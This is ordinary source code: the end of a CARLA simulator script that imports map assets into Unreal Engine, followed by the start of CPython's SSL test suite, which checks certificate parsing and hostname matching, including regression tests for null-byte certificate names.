print("Commandlet:", full_command)
subprocess.call([full_command], shell=True)
def generate_import_setting_file(package_name, json_dirname, props, maps, do_tiles, tile_size):
"""Creates the PROPS and MAPS import_setting.json file needed
as an argument for using the ImportAssets commandlet
"""
importfile = os.path.join(os.getcwd(), IMPORT_SETTING_FILENAME)
if os.path.exists(importfile):
os.remove(importfile)
with open(importfile, "w+") as fh:
import_groups = []
file_names = []
import_settings = {
"bImportMesh": 1,
"bConvertSceneUnit": 1,
"bConvertScene": 1,
"bCombineMeshes": 1,
"bImportTextures": 1,
"bImportMaterials": 1,
"bRemoveDegenerates": 1,
"AnimSequenceImportData": {},
"SkeletalMeshImportData": {},
"TextureImportData": {},
"StaticMeshImportData": {
"bRemoveDegenerates": 1,
"bAutoGenerateCollision": 1,
"bCombineMeshes": 0,
"bConvertSceneUnit": 1,
"bForceVerticesRelativeToTile": do_tiles,
"TileSize": tile_size
}
}
for prop in props:
props_dest = "/" + "/".join(["Game", package_name, "Static", prop["tag"], prop["name"]])
file_names = [os.path.join(json_dirname, prop["source"])]
import_groups.append({
"ImportSettings": import_settings,
"FactoryName": "FbxFactory",
"DestinationPath": props_dest,
"bReplaceExisting": "true",
"FileNames": file_names
})
for umap in maps:
maps_dest = "/" + "/".join(["Game", package_name, "Maps", umap["name"]])
if "source" in umap:
tiles = [os.path.join(json_dirname, umap["source"])]
else:
tiles = ["%s" % (os.path.join(json_dirname, x)) for x in umap["tiles"]]
import_groups.append({
"ImportSettings": import_settings,
"FactoryName": "FbxFactory",
"DestinationPath": maps_dest,
"bReplaceExisting": "true",
"FileNames": tiles
})
fh.write(json.dumps({"ImportGroups": import_groups}))
fh.close()
return importfile
def generate_package_file(package_name, props, maps):
"""Creates the PackageName.Package.json file for the package."""
output_json = {}
output_json["props"] = []
for prop in props:
name = prop["name"]
size = prop["size"]
source_name = os.path.basename(prop["source"]).split('.')
if len(source_name) < 2:
print("[Warning] File name '" + prop["source"] + "' contains multiple dots ('.')")
source_name = '.'.join([source_name[0], source_name[0]])
path = "/" + "/".join(["Game", package_name, "Static", prop["tag"], prop["name"], source_name])
output_json["props"].append({
"name": name,
"path": path,
"size": size,
})
output_json["maps"] = []
for umap in maps:
path = "/" + "/".join(["Game", package_name, "Maps", umap["name"]])
use_carla_materials = umap["use_carla_materials"] if "use_carla_materials" in umap else False
output_json["maps"].append({
"name": umap["name"],
"path": path,
"use_carla_materials": use_carla_materials
})
package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config")
if not os.path.exists(package_config_path):
try:
os.makedirs(package_config_path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(package_config_path, package_name + ".Package.json"), "w+") as fh:
json.dump(output_json, fh, indent=4)
def copy_roadpainter_config_files(package_name):
"""Copies roadpainter configuration files into Unreal content folder"""
two_directories_up = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
final_path = os.path.join(two_directories_up, "Import", "roadpainter_decals.json")
package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config")
if not os.path.exists(package_config_path):
try:
os.makedirs(package_config_path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
shutil.copy(final_path, package_config_path)
def copy_roadpainter_config_files(package_name):
"""Copies roadpainter configuration files into Unreal content folder"""
two_directories_up = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
final_path = os.path.join(two_directories_up, "Import", "roadpainter_decals.json")
package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config")
if not os.path.exists(package_config_path):
try:
os.makedirs(package_config_path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
shutil.copy(final_path, package_config_path)
def import_assets(package_name, json_dirname, props, maps, do_tiles, tile_size):
"""Same commandlet is used for importing assets and also maps."""
commandlet_name = "ImportAssets"
# Import Props
import_setting_file = generate_import_setting_file(package_name, json_dirname, props, maps, do_tiles, tile_size)
commandlet_arguments = ["-importSettings=\"%s\"" % import_setting_file, "-nosourcecontrol", "-replaceexisting"]
invoke_commandlet(commandlet_name, commandlet_arguments)
os.remove(import_setting_file)
# Move maps XODR files if any
for umap in maps:
# Make sure XODR info is full and the file exists
if "xodr" in umap and umap["xodr"] and os.path.isfile(os.path.join(json_dirname, umap["xodr"])):
# Make sure the `.xodr` file have the same name than the `.umap`
xodr_path = os.path.abspath(os.path.join(json_dirname, umap["xodr"]))
umap_name = umap["name"]
xodr_name = '.'.join([umap_name, "xodr"])
xodr_folder_destin = os.path.join(
CARLA_ROOT_PATH,
"Unreal",
"CarlaUE4",
"Content",
package_name,
"Maps",
umap_name,
"OpenDrive")
if not os.path.exists(xodr_folder_destin):
os.makedirs(xodr_folder_destin)
xodr_path_destin = os.path.join(
xodr_folder_destin,
xodr_name)
print('Copying "' + xodr_path + '" to "' + xodr_path_destin + '"')
shutil.copy2(xodr_path, xodr_path_destin)
# Create package file
generate_package_file(package_name, props, maps)
def import_assets_from_json_list(json_list):
maps = []
package_name = ""
for dirname, filename in json_list:
# Read json file
with open(os.path.join(dirname, filename)) as json_file:
data = json.load(json_file)
# Take all the fbx registered in the provided json files
# and place it inside unreal in the provided path (by the json file)
maps = []
props = []
if "maps" in data:
maps = data["maps"]
if "props" in data:
props = data["props"]
if "tile_size" in maps[0]:
tile_size = maps[0]["tile_size"]
else:
tile_size = 2000
package_name = filename.replace(".json", "")
# we need to build the binary file for navigation of pedestrians
thr = threading.Thread(target=build_binary_for_navigation, args=(package_name, dirname, maps,))
thr.start()
if ("tiles" in maps[0]):
import_assets(package_name, dirname, props, maps, 1, tile_size)
else:
import_assets(package_name, dirname, props, maps, 0, 0)
if not package_name:
print("No Packages JSONs found, nothing to import. Skipping package.")
continue
# First we only move the meshes to the tagged folders for semantic segmentation
move_assets_commandlet(package_name, maps)
# We prepare only the maps for cooking after moving them. Props cooking will be done from Package.sh script.
if len(maps) > 0:
prepare_maps_commandlet_for_cooking(package_name, only_prepare_maps=True)
load_asset_materials_commandlet(package_name)
thr.join()
def load_asset_materials_commandlet(package_name):
commandlet_name = "LoadAssetMaterials"
commandlet_arguments = ["-PackageName=%s" % package_name]
invoke_commandlet(commandlet_name, commandlet_arguments)
def prepare_maps_commandlet_for_cooking(package_name, only_prepare_maps):
commandlet_name = "PrepareAssetsForCooking"
commandlet_arguments = ["-PackageName=%s" % package_name]
commandlet_arguments.append("-OnlyPrepareMaps=%d" % only_prepare_maps)
invoke_commandlet(commandlet_name, commandlet_arguments)
def move_assets_commandlet(package_name, maps):
commandlet_name = "MoveAssets"
commandlet_arguments = ["-PackageName=%s" % package_name]
umap_names = ""
for umap in maps:
umap_names += umap["name"] + " "
commandlet_arguments.append("-Maps=%s" % umap_names)
invoke_commandlet(commandlet_name, commandlet_arguments)
# build the binary file for navigation of pedestrians for that map
def build_binary_for_navigation(package_name, dirname, maps):
folder = os.path.join(CARLA_ROOT_PATH, "Util", "DockerUtils", "dist")
# process each map
for umap in maps:
# get the sources for the map (single or tiles)
if ("source" in umap):
tiles = [umap["source"]]
elif ("tiles" in umap):
tiles = umap["tiles"]
else:
continue
# get the target name
target_name = umap["name"]
xodr_filename = os.path.basename(umap["xodr"])
# copy the XODR file into docker utils folder
if "xodr" in umap and umap["xodr"] and os.path.isfile(os.path.join(dirname, umap["xodr"])):
# Make sure the `.xodr` file have the same name than the `.umap`
xodr_path_source = os.path.abspath(os.path.join(dirname, umap["xodr"]))
xodr_path_target = os.path.join(folder, xodr_filename)
# copy
print('Copying "' + xodr_path_source + '" to "' + xodr_path_target + '"')
shutil.copy2(xodr_path_source, xodr_path_target)
for tile in tiles:
fbx_filename = os.path.basename(tile)
fbx_name_no_ext = os.path.splitext(fbx_filename)[0]
# copy the FBX file into docker utils folder
if os.path.isfile(os.path.join(dirname, tile)):
# Make sure the `.fbx` file have the same name than the `.umap`
fbx_path_source = os.path.abspath(os.path.join(dirname, tile))
fbx_path_target = os.path.join(folder, fbx_filename)
# copy
print('Copying "' + fbx_path_source + '" to "' + fbx_path_target + '"')
shutil.copy2(fbx_path_source, fbx_path_target)
# rename the xodr with the same name of the source/tile
# os.rename(os.path.join(folder, xodr_filename), os.path.join(folder, "%s.xodr" % fbx_name_no_ext))
# make the conversion
if os.name == "nt":
subprocess.call(["build.bat", fbx_name_no_ext, xodr_filename], cwd=folder, shell=True)
else:
subprocess.call(["chmod +x build.sh"], cwd=folder, shell=True)
subprocess.call("./build.sh %s %s" % (fbx_name_no_ext, xodr_filename), cwd=folder, shell=True)
# rename the xodr with the original name
# os.rename(os.path.join(folder, "%s.xodr" % fbx_name_no_ext), os.path.join(folder, xodr_filename))
# copy the binary file
nav_path_source = os.path.join(folder, "%s.bin" % fbx_name_no_ext)
nav_folder_target = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Maps", target_name, "Nav")
if os.path.exists(nav_path_source):
if not os.path.exists(nav_folder_target):
os.makedirs(nav_folder_target)
nav_path_target = os.path.join(nav_folder_target, "%s.bin" % fbx_name_no_ext)
print('Copying "' + nav_path_source + '" to "' + nav_path_target + '"')
shutil.copy2(nav_path_source, nav_path_target)
# remove files
if os.path.exists(nav_path_source):
os.remove(nav_path_source)
if os.path.exists(fbx_path_target):
os.remove(fbx_path_target)
os.remove(xodr_path_target)
def main():
argparser = argparse.ArgumentParser(description=__doc__)
argparser.add_argument(
'--package',
metavar='P',
default='map_package',
help='Name of the imported package')
argparser.add_argument(
'--no-carla-materials',
action='store_false',
help='user Carla materials')
argparser.add_argument(
'--json-only',
action='store_true',
help='Create JSON files only')
args = argparser.parse_known_args()[0]
import_folder = os.path.join(CARLA_ROOT_PATH, "Import")
json_list = get_packages_json_list(import_folder)
decals_json = get_decals_json_file(import_folder)
if len(json_list) < 1:
json_list = generate_json_package(import_folder, args.package, args.no_carla_materials)
if len(decals_json) == 0:
decals_json_file = generate_decals_file(import_folder)
if args.json_only == False:
copy_roadpainter_config_files(args.package)
import_assets_from_json_list(json_list)
if __name__ == '__main__':
main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
WRONG_CERT = data_file("wrongcert.pem")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Jan 17 19:09:06 2028 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': 'F9BA076D5B6ABD9B',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 28 19:09:06 2027 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': '82EDBF41C880919C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
client_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
